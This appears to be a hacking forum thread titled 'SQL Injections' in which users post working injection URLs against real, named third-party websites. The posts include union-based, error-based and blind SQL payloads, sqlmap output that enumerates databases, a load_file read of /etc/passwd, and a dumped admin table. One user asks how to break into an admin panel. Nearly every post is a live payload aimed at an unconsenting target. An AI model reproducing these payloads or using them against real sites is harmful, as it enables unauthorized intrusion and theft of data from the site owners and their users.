SQL Injections

Discussion in 'Vulnerabilities' started by yarbabin, 27 Apr 2015.

  1. joelblack

    target: http://atmarine.fi
    type: Error-Based
    user: w8400337db@10.0.8.89
    db: 5.5.51-MariaDB
    Code:
    http://atmarine.fi/index.php?id=2 AND (SELECT 2796 FROM(SELECT COUNT(*),CONCAT_WS(CHAR(32,58,32),user(),database(),version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
    target: http://www.ubraintv.com

    type: Union-Based
    user: ubraintv@localhost
    db: 5.1.73 MySQL

    Code:
    http://www.ubraintv.com/watchchannel.php?id=6' UNION ALL SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7-- -
     
  2. Dri-M

    www.yorgasmic.com/article.php?id=148


    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=148 AND 3436=3436
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=148 OR (SELECT 2443 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2443=2443,1))),0x7178706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=148 AND SLEEP(5)
    ---
     
  3. Vip77

    ALEXA 12,361

    Code:
    http://singtao.ca/events/Thatcher/article.php?ID=1+union+all+select+null,null,null,load_file('/etc/passwd'),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
     
    #183 Vip77, 10 Dec 2017
    Last edited by a moderator: 11 Dec 2017
  4. Dri-M

    http://www.aseanmarketplace.net/featured-listings.php?id=
    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause
        Payload: id=-2582 OR 5132=5132
    
        Type: AND/OR time-based blind
        Title: MySQL time-based blind - Parameter replace (MAKE_SET)
        Payload: id=MAKE_SET(8180=8180,SLEEP(5))
    ---
    available databases [2]:
    [*] amp
    [*] information_schema

    Table: admin
    [1 entry]
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    | 1  | read     | the first post                   |
    +----+----------+----------------------------------+


    How can I get into the admin panel? /administrator won't let me in...

    What should I do? Maybe someone can advise....
     
    #184 Dri-M, 11 Dec 2017
    Last edited by a moderator: 11 Dec 2017
  5. sepo

    Code:
    http://bw-plast.com/en/news.php?id=-2+union+select+1,2,3,4,version(),user(),7,database(),9,10,11,12,13,14--
    Code:
    http://www.jmtv.com/news.php?id=-3+union+select+1,version(),database()--
     
    #185 sepo, 16 Dec 2017
    Last edited by a moderator: 17 Dec 2017
  6. sepo

    Code:
    http://plasticospardo.com/english/noticias.php?id=-16+union+select+1,2,version(),4,database(),user(),7--
     
  7. BabaDook

    PHP:
    http://manul.tv/watch_video.php?v=R6DW4G16RRS8%27+and+false+union+select+database(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+--+-
     
  8. joelblack

    target: http://illan-gifts.ru
    type: Error-Based
    user: wapp@localhost
    version: 5.5.52-MariaDB

    Code:
    http://illan-gifts.ru/1'and(ExtractValue(1,concat(0x5c,(user()))))and'
     
  9. qwaszx000

    Code:
    http://www.jamestrussart.com/gallery.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11
    Number 2 is displayed.
     
    #189 qwaszx000, 13 Mar 2018
    Last edited: 13 Mar 2018
  10. sepo

    Code:
    https://c2-europe.eu/news-full.php?id=-1049+union+select+1,2,3,version(),5,6,database(),8,9,10,user(),12,13,14--
    Code:
    http://monroerec.com/event.php?id=-24%27+UnIOn+SeLEcT+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
     
    #190 sepo, 10 Jul 2018
    Last edited by a moderator: 10 Jul 2018
  11. RWD

    Code:
    https://www.unique-vintage.com/apps/swymEmails/interfaces/interfaceStore.php?appname=Emails
    Parameter: appname (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: appname=Emails' AND 8893=8893-- ZiPX
    ---
    [12:48:01] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL 5
    available databases [5]:
    [*] information_schema
    [*] mysql
    [*] pbcomput_swym
    [*] performance_schema
    [*] sys
    
     